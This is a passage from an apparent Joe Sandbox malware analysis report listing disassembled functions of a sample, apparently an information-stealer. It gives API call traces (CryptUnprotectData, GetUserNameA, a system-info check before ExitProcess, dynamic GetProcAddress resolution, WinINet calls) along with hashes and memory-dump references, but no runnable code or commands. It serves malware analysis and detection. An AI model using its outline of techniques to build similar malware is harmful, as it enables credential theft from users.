Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: cc13e54735f7245244bff232f5392c7253fba6fa3496be38b28e825a41f86445
Instruction ID: cf9b2388e6abef8248b8de3d6c9c484d2106e4119ca2e79567b4207f58506fda
Opcode Fuzzy Hash: cc13e54735f7245244bff232f5392c7253fba6fa3496be38b28e825a41f86445
Instruction Fuzzy Hash: DD11A5B8A00209EFDB05DF94D985AAEB7B5FB88300F104599ED15AB350D774AE14CFA1

Function 00357850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
RtlAllocateHeap.NTDLL(00000000), ref: 00357887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: f927972328d5242fb170dceca2be8a6afa4d6f51ef73a91377da31876a7f9417
Instruction ID: 382db567b5f28807a282c879b7125c26bc07907a3d66d836a6c9018424b660b3
Opcode Fuzzy Hash: f927972328d5242fb170dceca2be8a6afa4d6f51ef73a91377da31876a7f9417
Instruction Fuzzy Hash: D4F04FB1944208ABD710DF98DD4AFAEBBBCEB04711F10025AFA05A2690C77415088BA1

Function 00341160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0034116A
ExitProcess.KERNEL32 ref: 0034117E

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 11589211fc2ad4dd0cc0fb150febd5842a0c72f4972a1e82c145cc948d754480
Instruction ID: 12c7f7f02a108517f9236bcc2fd6dcc8033ba324cd04d8b331c8030b07bad9f4
Opcode Fuzzy Hash: 11589211fc2ad4dd0cc0fb150febd5842a0c72f4972a1e82c145cc948d754480
Instruction Fuzzy Hash: 18D05E7490030CDBDB00DFE0D8496DDBBB8FB08311F001555DD05B2340EA306486DBA6

Function 00359C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01265730), ref: 00359C2D
GetProcAddress.KERNEL32(74DD0000,01265850), ref: 00359C45
GetProcAddress.KERNEL32(74DD0000,012795F8), ref: 00359C5E
GetProcAddress.KERNEL32(74DD0000,01279568), ref: 00359C76
GetProcAddress.KERNEL32(74DD0000,01279580), ref: 00359C8E
GetProcAddress.KERNEL32(74DD0000,012795B0), ref: 00359CA7
GetProcAddress.KERNEL32(74DD0000,0126B970), ref: 00359CBF
GetProcAddress.KERNEL32(74DD0000,0127D1C8), ref: 00359CD7
GetProcAddress.KERNEL32(74DD0000,0127D138), ref: 00359CF0
GetProcAddress.KERNEL32(74DD0000,0127D120), ref: 00359D08
GetProcAddress.KERNEL32(74DD0000,0127D210), ref: 00359D20
GetProcAddress.KERNEL32(74DD0000,01265750), ref: 00359D39
GetProcAddress.KERNEL32(74DD0000,01265770), ref: 00359D51
GetProcAddress.KERNEL32(74DD0000,01265890), ref: 00359D69
GetProcAddress.KERNEL32(74DD0000,01265790), ref: 00359D82
GetProcAddress.KERNEL32(74DD0000,0127D1B0), ref: 00359D9A
GetProcAddress.KERNEL32(74DD0000,0127D330), ref: 00359DB2
GetProcAddress.KERNEL32(74DD0000,0126BA10), ref: 00359DCB
GetProcAddress.KERNEL32(74DD0000,012657B0), ref: 00359DE3
GetProcAddress.KERNEL32(74DD0000,0127D2A0), ref: 00359DFB
GetProcAddress.KERNEL32(74DD0000,0127D150), ref: 00359E14
GetProcAddress.KERNEL32(74DD0000,0127D0D8), ref: 00359E2C
GetProcAddress.KERNEL32(74DD0000,0127D240), ref: 00359E44
GetProcAddress.KERNEL32(74DD0000,012658F0), ref: 00359E5D
GetProcAddress.KERNEL32(74DD0000,0127D228), ref: 00359E75
GetProcAddress.KERNEL32(74DD0000,0127D258), ref: 00359E8D
GetProcAddress.KERNEL32(74DD0000,0127D0C0), ref: 00359EA6
GetProcAddress.KERNEL32(74DD0000,0127D360), ref: 00359EBE
GetProcAddress.KERNEL32(74DD0000,0127D1F8), ref: 00359ED6
GetProcAddress.KERNEL32(74DD0000,0127D1E0), ref: 00359EEF
GetProcAddress.KERNEL32(74DD0000,0127D2D0), ref: 00359F07
GetProcAddress.KERNEL32(74DD0000,0127D0F0), ref: 00359F1F
GetProcAddress.KERNEL32(74DD0000,0127D270), ref: 00359F38
GetProcAddress.KERNEL32(74DD0000,0127A460), ref: 00359F50
GetProcAddress.KERNEL32(74DD0000,0127D300), ref: 00359F68
GetProcAddress.KERNEL32(74DD0000,0127D0A8), ref: 00359F81
GetProcAddress.KERNEL32(74DD0000,01265930), ref: 00359F99
GetProcAddress.KERNEL32(74DD0000,0127D378), ref: 00359FB1
GetProcAddress.KERNEL32(74DD0000,01265250), ref: 00359FCA
GetProcAddress.KERNEL32(74DD0000,0127D288), ref: 00359FE2
GetProcAddress.KERNEL32(74DD0000,0127D108), ref: 00359FFA
GetProcAddress.KERNEL32(74DD0000,012655F0), ref: 0035A013
GetProcAddress.KERNEL32(74DD0000,012655D0), ref: 0035A02B
LoadLibraryA.KERNEL32(0127D348,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A03D
LoadLibraryA.KERNEL32(0127D2B8,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A04E
LoadLibraryA.KERNEL32(0127D2E8,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A060
LoadLibraryA.KERNEL32(0127D168,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A072
LoadLibraryA.KERNEL32(0127D180,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A083
LoadLibraryA.KERNEL32(0127D318,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A095
LoadLibraryA.KERNEL32(0127D390,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A0A7
LoadLibraryA.KERNEL32(0127D198,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A0B8
GetProcAddress.KERNEL32(75290000,012654B0), ref: 0035A0DA
GetProcAddress.KERNEL32(75290000,0127D480), ref: 0035A0F2
GetProcAddress.KERNEL32(75290000,01278FE0), ref: 0035A10A
GetProcAddress.KERNEL32(75290000,0127D558), ref: 0035A123
GetProcAddress.KERNEL32(75290000,01265450), ref: 0035A13B
GetProcAddress.KERNEL32(6FCD0000,0126BA38), ref: 0035A160
GetProcAddress.KERNEL32(6FCD0000,012652F0), ref: 0035A179
GetProcAddress.KERNEL32(6FCD0000,0126B8A8), ref: 0035A191
GetProcAddress.KERNEL32(6FCD0000,0127D510), ref: 0035A1A9
GetProcAddress.KERNEL32(6FCD0000,0127D4C8), ref: 0035A1C2
GetProcAddress.KERNEL32(6FCD0000,012653F0), ref: 0035A1DA
GetProcAddress.KERNEL32(6FCD0000,01265550), ref: 0035A1F2
GetProcAddress.KERNEL32(6FCD0000,0127D3A8), ref: 0035A20B
GetProcAddress.KERNEL32(752C0000,01265210), ref: 0035A22C
GetProcAddress.KERNEL32(752C0000,012655B0), ref: 0035A244
GetProcAddress.KERNEL32(752C0000,0127D498), ref: 0035A25D
GetProcAddress.KERNEL32(752C0000,0127D3C0), ref: 0035A275
GetProcAddress.KERNEL32(752C0000,01265310), ref: 0035A28D
GetProcAddress.KERNEL32(74EC0000,0126B8D0), ref: 0035A2B3
GetProcAddress.KERNEL32(74EC0000,0126B6C8), ref: 0035A2CB
GetProcAddress.KERNEL32(74EC0000,0127D438), ref: 0035A2E3
GetProcAddress.KERNEL32(74EC0000,01265410), ref: 0035A2FC
GetProcAddress.KERNEL32(74EC0000,01265530), ref: 0035A314
GetProcAddress.KERNEL32(74EC0000,0126BAB0), ref: 0035A32C
GetProcAddress.KERNEL32(75BD0000,0127D3D8), ref: 0035A352
GetProcAddress.KERNEL32(75BD0000,01265570), ref: 0035A36A
GetProcAddress.KERNEL32(75BD0000,01278F50), ref: 0035A382
GetProcAddress.KERNEL32(75BD0000,0127D420), ref: 0035A39B
GetProcAddress.KERNEL32(75BD0000,0127D528), ref: 0035A3B3
GetProcAddress.KERNEL32(75BD0000,01265230), ref: 0035A3CB
GetProcAddress.KERNEL32(75BD0000,01265270), ref: 0035A3E4
GetProcAddress.KERNEL32(75BD0000,0127D3F0), ref: 0035A3FC
GetProcAddress.KERNEL32(75BD0000,0127D468), ref: 0035A414
GetProcAddress.KERNEL32(75A70000,012652B0), ref: 0035A436
GetProcAddress.KERNEL32(75A70000,0127D4B0), ref: 0035A44E
GetProcAddress.KERNEL32(75A70000,0127D540), ref: 0035A466
GetProcAddress.KERNEL32(75A70000,0127D408), ref: 0035A47F
GetProcAddress.KERNEL32(75A70000,0127D4F8), ref: 0035A497
GetProcAddress.KERNEL32(75450000,01265290), ref: 0035A4B8
GetProcAddress.KERNEL32(75450000,01265470), ref: 0035A4D1
GetProcAddress.KERNEL32(75DA0000,012652D0), ref: 0035A4F2
GetProcAddress.KERNEL32(75DA0000,0127D4E0), ref: 0035A50A
GetProcAddress.KERNEL32(6F070000,01265330), ref: 0035A530
GetProcAddress.KERNEL32(6F070000,01265350), ref: 0035A548
GetProcAddress.KERNEL32(6F070000,012653B0), ref: 0035A560
GetProcAddress.KERNEL32(6F070000,0127D450), ref: 0035A579
GetProcAddress.KERNEL32(6F070000,01265370), ref: 0035A591
GetProcAddress.KERNEL32(6F070000,01265590), ref: 0035A5A9
GetProcAddress.KERNEL32(6F070000,01265390), ref: 0035A5C2
GetProcAddress.KERNEL32(6F070000,012654D0), ref: 0035A5DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0035A5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0035A607
GetProcAddress.KERNEL32(75AF0000,0127D018), ref: 0035A629
GetProcAddress.KERNEL32(75AF0000,01278FA0), ref: 0035A641
GetProcAddress.KERNEL32(75AF0000,0127CF28), ref: 0035A659
GetProcAddress.KERNEL32(75AF0000,0127D060), ref: 0035A672
GetProcAddress.KERNEL32(75D90000,012653D0), ref: 0035A693
GetProcAddress.KERNEL32(6CFD0000,0127CDA8), ref: 0035A6B4
GetProcAddress.KERNEL32(6CFD0000,01265490), ref: 0035A6CD
GetProcAddress.KERNEL32(6CFD0000,0127CDF0), ref: 0035A6E5
GetProcAddress.KERNEL32(6CFD0000,0127CE08), ref: 0035A6FD

Strings

HttpQueryInfoA, xrefs: 0035A5FC
InternetSetOptionA, xrefs: 0035A5E5

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 81016bdce039d4f7afe0de30ded6eb0bc9ef79ed7973c29820d17aa901e3b369
Instruction ID: 5f595d607e350146fb3b888d74f6efb0bef7f945ad9256e13b127d0814fd3ab6
Opcode Fuzzy Hash: 81016bdce039d4f7afe0de30ded6eb0bc9ef79ed7973c29820d17aa901e3b369
Instruction Fuzzy Hash: 2A627DB5500200AFF748DFA8ED8896637F9F76C701304A51BAE45E3225D739A45AFF22

Function 00347710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00347724
RtlAllocateHeap.NTDLL(00000000), ref: 0034772B
lstrcat.KERNEL32(?,01279C98), ref: 003478DB
lstrcat.KERNEL32(?,?), ref: 003478EF
lstrcat.KERNEL32(?,?), ref: 00347903
lstrcat.KERNEL32(?,?), ref: 00347917
lstrcat.KERNEL32(?,0127E4A8), ref: 0034792B
lstrcat.KERNEL32(?,0127E4C0), ref: 0034793F
lstrcat.KERNEL32(?,0127E4D8), ref: 00347952
lstrcat.KERNEL32(?,0127E3D0), ref: 00347966
lstrcat.KERNEL32(?,01279D20), ref: 0034797A
lstrcat.KERNEL32(?,?), ref: 0034798E
lstrcat.KERNEL32(?,?), ref: 003479A2
lstrcat.KERNEL32(?,?), ref: 003479B6
lstrcat.KERNEL32(?,0127E4A8), ref: 003479C9
lstrcat.KERNEL32(?,0127E4C0), ref: 003479DD
lstrcat.KERNEL32(?,0127E4D8), ref: 003479F1
lstrcat.KERNEL32(?,0127E3D0), ref: 00347A04
lstrcat.KERNEL32(?,01279D88), ref: 00347A18
lstrcat.KERNEL32(?,?), ref: 00347A2C
lstrcat.KERNEL32(?,?), ref: 00347A40
lstrcat.KERNEL32(?,?), ref: 00347A54
lstrcat.KERNEL32(?,0127E4A8), ref: 00347A68
lstrcat.KERNEL32(?,0127E4C0), ref: 00347A7B
lstrcat.KERNEL32(?,0127E4D8), ref: 00347A8F
lstrcat.KERNEL32(?,0127E3D0), ref: 00347AA3
lstrcat.KERNEL32(?,0127E590), ref: 00347AB6
lstrcat.KERNEL32(?,?), ref: 00347ACA
lstrcat.KERNEL32(?,?), ref: 00347ADE
lstrcat.KERNEL32(?,?), ref: 00347AF2
lstrcat.KERNEL32(?,0127E4A8), ref: 00347B06
lstrcat.KERNEL32(?,0127E4C0), ref: 00347B1A
lstrcat.KERNEL32(?,0127E4D8), ref: 00347B2D
lstrcat.KERNEL32(?,0127E3D0), ref: 00347B41
lstrcat.KERNEL32(?,0127E5F8), ref: 00347B55
lstrcat.KERNEL32(?,?), ref: 00347B69
lstrcat.KERNEL32(?,?), ref: 00347B7D
lstrcat.KERNEL32(?,?), ref: 00347B91
lstrcat.KERNEL32(?,0127E4A8), ref: 00347BA4
lstrcat.KERNEL32(?,0127E4C0), ref: 00347BB8
lstrcat.KERNEL32(?,0127E4D8), ref: 00347BCC
lstrcat.KERNEL32(?,0127E3D0), ref: 00347BDF
lstrcat.KERNEL32(?,0127E660), ref: 00347BF3
lstrcat.KERNEL32(?,?), ref: 00347C07
lstrcat.KERNEL32(?,?), ref: 00347C1B
lstrcat.KERNEL32(?,?), ref: 00347C2F
lstrcat.KERNEL32(?,0127E4A8), ref: 00347C43
lstrcat.KERNEL32(?,0127E4C0), ref: 00347C56
lstrcat.KERNEL32(?,0127E4D8), ref: 00347C6A
lstrcat.KERNEL32(?,0127E3D0), ref: 00347C7E

Part of subcall function 003475D0: lstrcat.KERNEL32(2F7EC020,003617FC), ref: 00347606
Part of subcall function 003475D0: lstrcat.KERNEL32(2F7EC020,00000000), ref: 00347648
Part of subcall function 003475D0: lstrcat.KERNEL32(2F7EC020, : ), ref: 0034765A
Part of subcall function 003475D0: lstrcat.KERNEL32(2F7EC020,00000000), ref: 0034768F
Part of subcall function 003475D0: lstrcat.KERNEL32(2F7EC020,00361804), ref: 003476A0
Part of subcall function 003475D0: lstrcat.KERNEL32(2F7EC020,00000000), ref: 003476D3
Part of subcall function 003475D0: lstrcat.KERNEL32(2F7EC020,00361808), ref: 003476ED
Part of subcall function 003475D0: task.LIBCPMTD ref: 003476FB

lstrcat.KERNEL32(?,0127E7C8), ref: 00347E0B
lstrcat.KERNEL32(?,0127DD30), ref: 00347E1E
lstrlen.KERNEL32(2F7EC020), ref: 00347E2B
lstrlen.KERNEL32(2F7EC020), ref: 00347E3B

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: df7765f2900af81ad9a2f1201c7ae6a7041767aa055bce8f18392743525ce2b3
Instruction ID: bfbdfeb3245a1151afd003efee390ddee729d5bbbc59d19099fa1c9580ef566d
Opcode Fuzzy Hash: df7765f2900af81ad9a2f1201c7ae6a7041767aa055bce8f18392743525ce2b3
Instruction Fuzzy Hash: 73321FB2800314ABDB16EBA0DC85DEA737CBB54701F445A89F60976090EF74E78ADF61

Function 00350250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

